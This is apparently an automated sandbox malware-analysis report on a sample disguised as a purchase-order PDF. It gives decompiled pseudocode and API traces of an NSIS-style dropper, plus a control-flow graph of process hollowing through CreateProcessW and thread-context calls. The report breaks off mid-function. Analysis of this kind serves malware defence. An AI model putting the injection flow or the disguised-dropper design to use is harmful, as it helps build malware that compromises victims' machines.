                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,02451656,7FAB7E30), ref: 02450E86
                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040), ref: 02450EB0
                                            • ReadFile.KERNEL32(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000), ref: 02450EC7
                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040), ref: 02450EE9
                                            • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040,?,00000000,0000000E), ref: 02450F5B
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040,?), ref: 02450F66
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040,?), ref: 02450FB1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                            • String ID:
                                            • API String ID: 656311269-0
                                            • Opcode ID: ce1a21581a1d3c8f3fac88fdd94d9c6fcb191cccf3e5ae48aa48ce066747a06c
                                            • Instruction ID: 8b8ca691fb7a9dbe3aef6a0893c9d8d553b45feead42372121a434550edf58d5
                                            • Opcode Fuzzy Hash: ce1a21581a1d3c8f3fac88fdd94d9c6fcb191cccf3e5ae48aa48ce066747a06c
                                            • Instruction Fuzzy Hash: FA51AD76E00228BBDB209FB5DC44BAEB7B9AF0C714F10551AFD81F7281D7B499418B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 485 4069c5-4069e5 GetSystemDirectoryW 486 4069e7 485->486 487 4069e9-4069eb 485->487 486->487 488 4069fc-4069fe 487->488 489 4069ed-4069f6 487->489 490 4069ff-406a32 wsprintfW LoadLibraryExW 488->490 489->488 491 4069f8-4069fa 489->491 491->490
                                            C-Code - Quality: 100%
                                            			E004069C5(intOrPtr _a4) {
                                            				short _v576;
                                            				signed int _t13;
                                            				struct HINSTANCE__* _t17;
                                            				signed int _t19;
                                            				void* _t24;
                                            
                                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                            				if(_t13 > 0x104) {
                                            					_t13 = 0;
                                            				}
                                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                            					_t19 = 1;
                                            				} else {
                                            					_t19 = 0;
                                            				}
                                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                            				return _t17;
                                            			}








                                            0x004069dc
                                            0x004069e5
                                            0x004069e7
                                            0x004069e7
                                            0x004069eb
                                            0x004069fe
                                            0x004069f8
                                            0x004069f8
                                            0x004069f8
                                            0x00406a17
                                            0x00406a2b
                                            0x00406a32

                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                            • wsprintfW.USER32 ref: 00406A17
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925
                                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 492 245020a-2450225 call 245005f 495 2450228-245022c 492->495 496 2450244-2450251 495->496 497 245022e-2450242 495->497 498 2450254-2450258 496->498 497->495 499 2450270-245027d 498->499 500 245025a-245026e 498->500 501 2450280-2450284 499->501 500->498 502 2450286-245029a 501->502 503 245029c-245037a call 2450073 * 8 501->503 502->501 520 2450391 503->520 521 245037c-2450386 503->521 523 2450395-24503b1 520->523 521->520 522 2450388-245038f 521->522 522->523 525 24503b3-24503b5 523->525 526 24503ba 523->526 527 2450734-2450737 525->527 528 24503c1-24503e9 CreateProcessW 526->528 529 24503f0-2450409 Wow64GetThreadContext 528->529 530 24503eb 528->530 532 2450410-245042d ReadProcessMemory 529->532 533 245040b 529->533 531 24506e8-24506ec 530->531 536 2450731-2450733 531->536 537 24506ee-24506f2 531->537 534 2450434-245043d 532->534 535 245042f 532->535 533->531 538 2450464-2450483 call 2451206 534->538 539 245043f-245044e 534->539 535->531 536->527 540 2450705-2450709 537->540 541 24506f4-24506ff 537->541 554 2450485 538->554 555 245048a-24504ab call 2451320 538->555 539->538 542 2450450-2450456 call 2451171 539->542 544 2450711-2450715 540->544 545 245070b 540->545 541->540 553 245045b-245045d 542->553 546 2450717 544->546 547 245071d-2450721 544->547 545->544 546->547 551 2450723-2450728 call 2451171 547->551 552 245072d-245072f 547->552 551->552 552->527 553->538 557 245045f 553->557 554->531 560 24504f0-2450510 call 2451320 555->560 561 24504ad-24504b4 555->561 557->531 568 2450517-245052c call 24500da 560->568 569 2450512 560->569 562 24504b6-24504e2 call 2451320 561->562 563 24504eb 561->563 570 24504e4 562->570 571 24504e9 562->571 563->531 574 2450535-245053f 568->574 569->531 570->531 571->560 575 2450571-2450575 574->575 576 2450541-245056f call 24500da 574->576 578 2450655-2450671 call 2450fbf 575->578 579 245057b-2450589 575->579 576->574 586 2450675-2450696 Wow64SetThreadContext 578->586 587 2450673 578->587 579->578 582 245058f-245059d 579->582 582->578 585 24505a3-24505c3 582->585 588 24505c6-24505ca 585->588 589 2450698 586->589 590 245069a-24506a4 call 24510c0 586->590 587->531 588->578 591 24505d0-24505e5 588->591 589->531 597 24506a6 590->597 598 24506a8-24506ac 590->598 593 24505f7-24505fb 591->593 595 24505fd-2450609 593->595 596 2450638-2450650 593->596 599 2450636 595->599 600 245060b-2450634 595->600 596->588 597->531 601 24506b4-24506b8 598->601 602 24506ae 598->602 599->593 600->599 604 24506c0-24506c4 601->604 605 24506ba 601->605 602->601 606 24506c6 604->606 607 24506cc-24506d0 604->607 605->604 606->607 608 24506d2-24506d7 call 2451171 607->608 609 24506dc-24506e2 607->609 608->609 609->528 609->531
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: D
                                            • API String ID: 0-2746444292
                                            • Opcode ID: 3e9e2c443f36ccde16643644dd0cb0013996c3119d17eb4d1c870ec734e8282a
                                            • Instruction ID: 8363c0826583cce35e2ac3d7b35316ec2b8174665063d0c8e03f1cd285d51578
                                            • Opcode Fuzzy Hash: 3e9e2c443f36ccde16643644dd0cb0013996c3119d17eb4d1c870ec734e8282a
                                            • Instruction Fuzzy Hash: CE021574D00229EFDF10CF94CD85BADBBB5BF08705F20506AE955BA292D774AA81CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 611 405b99-405be4 CreateDirectoryW 612 405be6-405be8 611->612 613 405bea-405bf7 GetLastError 611->613 614 405c11-405c13 612->614 613->614 615 405bf9-405c0d SetFileSecurityW 613->615 615->612 616 405c0f GetLastError 615->616 616->614
                                            C-Code - Quality: 100%
                                            			E00405B99(WCHAR* _a4) {
                                            				struct _SECURITY_ATTRIBUTES _v16;
                                            				struct _SECURITY_DESCRIPTOR _v36;
                                            				int _t22;
                                            				long _t23;
                                            
                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                            				_v36.Owner = 0x4083f8;
                                            				_v36.Group = 0x4083f8;
                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                            				_v16.lpSecurityDescriptor =  &_v36;
                                            				_v36.Revision = 1;
                                            				_v36.Control = 4;
                                            				_v36.Dacl = 0x4083e8;
                                            				_v16.nLength = 0xc;
                                            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                            				if(_t22 != 0) {
                                            					L1:
                                            					return 0;
                                            				}
                                            				_t23 = GetLastError();
                                            				if(_t23 == 0xb7) {
                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                            						goto L1;
                                            					}
                                            					return GetLastError();
                                            				}
                                            				return _t23;
                                            			}







                                            0x00405ba4
                                            0x00405ba8
                                            0x00405bab
                                            0x00405bb1
                                            0x00405bb5
                                            0x00405bb9
                                            0x00405bc1
                                            0x00405bc8
                                            0x00405bce
                                            0x00405bd5
                                            0x00405bdc
                                            0x00405be4
                                            0x00405be6
                                            0x00000000
                                            0x00405be6
                                            0x00405bf0
                                            0x00405bf7
                                            0x00405c0d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405c0f
                                            0x00405c13

                                            APIs
                                            • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                            • GetLastError.KERNEL32 ref: 00405BF0
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                            • GetLastError.KERNEL32 ref: 00405C0F
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 3449924974-1098563871
                                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 617 406187-406193 618 406194-4061c8 GetTickCount GetTempFileNameW 617->618 619 4061d7-4061d9 618->619 620 4061ca-4061cc 618->620 622 4061d1-4061d4 619->622 620->618 621 4061ce 620->621 621->622
                                            C-Code - Quality: 100%
                                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                            				intOrPtr _v8;
                                            				short _v12;
                                            				short _t12;
                                            				intOrPtr _t13;
                                            				signed int _t14;
                                            				WCHAR* _t17;
                                            				signed int _t19;
                                            				signed short _t23;
                                            				WCHAR* _t26;
                                            
                                            				_t26 = _a4;
                                            				_t23 = 0x64;
                                            				while(1) {
                                            					_t12 =  *L"nsa"; // 0x73006e
                                            					_t23 = _t23 - 1;
                                            					_v12 = _t12;
                                            					_t13 =  *0x40a5ac; // 0x61
                                            					_v8 = _t13;
                                            					_t14 = GetTickCount();
                                            					_t19 = 0x1a;
                                            					_v8 = _v8 + _t14 % _t19;
                                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                            					if(_t17 != 0) {
                                            						break;
                                            					}
                                            					if(_t23 != 0) {
                                            						continue;
                                            					} else {
                                            						 *_t26 =  *_t26 & _t23;
                                            					}
                                            					L4:
                                            					return _t17;
                                            				}
                                            				_t17 = _t26;
                                            				goto L4;
                                            			}












                                            0x0040618d
                                            0x00406193
                                            0x00406194
                                            0x00406194
                                            0x00406199
                                            0x0040619a
                                            0x0040619d
                                            0x004061a2
                                            0x004061a5
                                            0x004061af
                                            0x004061bc
                                            0x004061c0
                                            0x004061c8
                                            0x00000000
                                            0x00000000
                                            0x004061cc
                                            0x00000000
                                            0x004061ce
                                            0x004061ce
                                            0x004061ce
                                            0x004061d1
                                            0x004061d4
                                            0x004061d4
                                            0x004061d7
                                            0x00000000

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 004061A5
                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-1055269216
                                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 661 4020d8-4020e4 662 4021a3-4021a5 661->662 663 4020ea-402100 call 402da6 * 2 661->663 664 4022f1-4022f6 call 401423 662->664 672 402110-40211f LoadLibraryExW 663->672 673 402102-40210e GetModuleHandleW 663->673 670 402c2a-402c39 664->670 675 402121-402130 call 406aa4 672->675 676 40219c-40219e 672->676 673->672 673->675 680 402132-402138 675->680 681 40216b-402170 call 4056ca 675->681 676->664 682 402151-402169 GetModuleHandleExW 680->682 683 40213a-402146 call 401423 680->683 686 402175-402178 681->686 682->686 683->686 693 402148-40214f 683->693 686->670 687 40217e-402188 call 403cb7 686->687 687->670 692 40218e-402197 FreeLibrary 687->692 692->670 693->686
                                            C-Code - Quality: 60%
                                            			E004020D8(void* __ebx, void* __eflags) {
                                            				struct HINSTANCE__* _t23;
                                            				struct HINSTANCE__* _t31;
                                            				void* _t32;
                                            				WCHAR* _t35;
                                            				intOrPtr* _t36;
                                            				void* _t37;
                                            				void* _t39;
                                            
                                            				_t32 = __ebx;
                                            				asm("sbb eax, 0x42a320");
                                            				 *(_t39 - 4) = 1;
                                            				if(__eflags < 0) {
                                            					_push(0xffffffe7);
                                            					L15:
                                            					E00401423();
                                            					L16:
                                            					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                            					return 0;
                                            				}
                                            				_t35 = E00402DA6(0xfffffff0);
                                            				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                            				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                            					L3:
                                            					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                            					_t47 = _t23 - _t32;
                                            					 *(_t39 + 8) = _t23;
                                            					if(_t23 == _t32) {
                                            						_push(0xfffffff6);
                                            						goto L15;
                                            					}
                                            					L4:
                                            					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                            					if(_t36 == _t32) {
                                            						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                            					} else {
                                            						 *(_t39 - 4) = _t32;
                                            						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                            							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
                                            						} else {
                                            							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                            							if( *_t36() != 0) {
                                            								 *(_t39 - 4) = 1;
                                            							}
                                            						}
                                            					}
                                            					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
                                            						FreeLibrary( *(_t39 + 8));
                                            					}
                                            					goto L16;
                                            				}
                                            				_t31 = GetModuleHandleW(_t35); // executed
                                            				 *(_t39 + 8) = _t31;
                                            				if(_t31 != __ebx) {
                                            					goto L4;
                                            				}
                                            				goto L3;
                                            			}










                                            0x004020d8
                                            0x004020d8
                                            0x004020dd
                                            0x004020e4
                                            0x004021a3
                                            0x004022f1
                                            0x004022f1
                                            0x00402c2a
                                            0x00402c2d
                                            0x00402c39
                                            0x00402c39
                                            0x004020f3
                                            0x004020fd
                                            0x00402100
                                            0x00402110
                                            0x00402114
                                            0x0040211a
                                            0x0040211c
                                            0x0040211f
                                            0x0040219c
                                            0x00000000
                                            0x0040219c
                                            0x00402121
                                            0x0040212c
                                            0x00402130
                                            0x00402170
                                            0x00402132
                                            0x00402135
                                            0x00402138
                                            0x00402164
                                            0x0040213a
                                            0x0040213d
                                            0x00402146
                                            0x00402148
                                            0x00402148
                                            0x00402146
                                            0x00402138
                                            0x00402178
                                            0x00402191
                                            0x00402191
                                            0x00000000
                                            0x00402178
                                            0x00402103
                                            0x0040210b
                                            0x0040210e
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402103
                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                            • GetModuleHandleExW.KERNEL32(?,00000400,?,0040CE58,0040A000,?,00000008,00000001,000000F0), ref: 00402164
                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSend$HandleLibraryModulelstrlen$FreeLoadTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2042231997-0
                                            • Opcode ID: c0fc562415b006524e612b10bc8b4f19115c3b5e74acc175c6571b6fb39ea03e
                                            • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                            • Opcode Fuzzy Hash: c0fc562415b006524e612b10bc8b4f19115c3b5e74acc175c6571b6fb39ea03e
                                            • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 777 4015c1-4015d5 call 402da6 call 405fe2 782 401631-401634 777->782 783 4015d7-4015ea call 405f64 777->783 785 401663-4022f6 call 401423 782->785 786 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 782->786 790 401604-401607 call 405c16 783->790 791 4015ec-4015ef 783->791 801 402c2a-402c39 785->801 786->801 803 40165b-40165e 786->803 800 40160c-40160e 790->800 791->790 794 4015f1-4015f8 call 405c33 791->794 794->790 807 4015fa-4015fd call 405b99 794->807 805 401610-401615 800->805 806 401627-40162f 800->806 803->801 809 401624 805->809 810 401617-401622 GetFileAttributesW 805->810 806->782 806->783 812 401602 807->812 809->806 810->806 810->809 812->800
                                            C-Code - Quality: 86%
                                            			E004015C1(short __ebx, void* __eflags) {
                                            				void* _t17;
                                            				int _t23;
                                            				void* _t25;
                                            				signed char _t26;
                                            				short _t28;
                                            				short _t31;
                                            				short* _t34;
                                            				void* _t36;
                                            
                                            				_t28 = __ebx;
                                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                            				_t17 = E00405FE2(_t16);
                                            				_t32 = _t17;
                                            				if(_t17 != __ebx) {
                                            					do {
                                            						_t34 = E00405F64(_t32, 0x5c);
                                            						_t31 =  *_t34;
                                            						 *_t34 = _t28;
                                            						if(_t31 != _t28) {
                                            							L5:
                                            							_t25 = E00405C16( *(_t36 + 8));
                                            						} else {
                                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                            								goto L5;
                                            							} else {
                                            								_t25 = E00405B99( *(_t36 + 8)); // executed
                                            							}
                                            						}
                                            						if(_t25 != _t28) {
                                            							if(_t25 != 0xb7) {
                                            								L9:
                                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                            							} else {
                                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                            								if((_t26 & 0x00000010) == 0) {
                                            									goto L9;
                                            								}
                                            							}
                                            						}
                                            						 *_t34 = _t31;
                                            						_t32 = _t34 + 2;
                                            					} while (_t31 != _t28);
                                            				}
                                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                            					_push(0xfffffff5);
                                            					E00401423();
                                            				} else {
                                            					E00401423(0xffffffe6);
                                            					E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp",  *(_t36 + 8));
                                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                            					if(_t23 == 0) {
                                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                            					}
                                            				}
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                            				return 0;
                                            			}











                                            0x004015c1
                                            0x004015c9
                                            0x004015cc
                                            0x004015d1
                                            0x004015d5
                                            0x004015d7
                                            0x004015df
                                            0x004015e1
                                            0x004015e4
                                            0x004015ea
                                            0x00401604
                                            0x00401607
                                            0x004015ec
                                            0x004015ec
                                            0x004015ef
                                            0x00000000
                                            0x004015fa
                                            0x004015fd
                                            0x004015fd
                                            0x004015ef
                                            0x0040160e
                                            0x00401615
                                            0x00401624
                                            0x00401624
                                            0x00401617
                                            0x0040161a
                                            0x00401622
                                            0x00000000
                                            0x00000000
                                            0x00401622
                                            0x00401615
                                            0x00401627
                                            0x0040162b
                                            0x0040162c
                                            0x004015d7
                                            0x00401634
                                            0x00401663
                                            0x004022f1
                                            0x00401636
                                            0x00401638
                                            0x00401645
                                            0x0040164d
                                            0x00401655
                                            0x0040165b
                                            0x0040165b
                                            0x00401655
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0,00000000), ref: 00405FF0
                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                              • Part of subcall function 00405B99: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 1892508949-1909526481
                                            • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                            • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 99%
                                            			E00407194() {
                                            				signed int _t530;
                                            				void _t537;
                                            				signed int _t538;
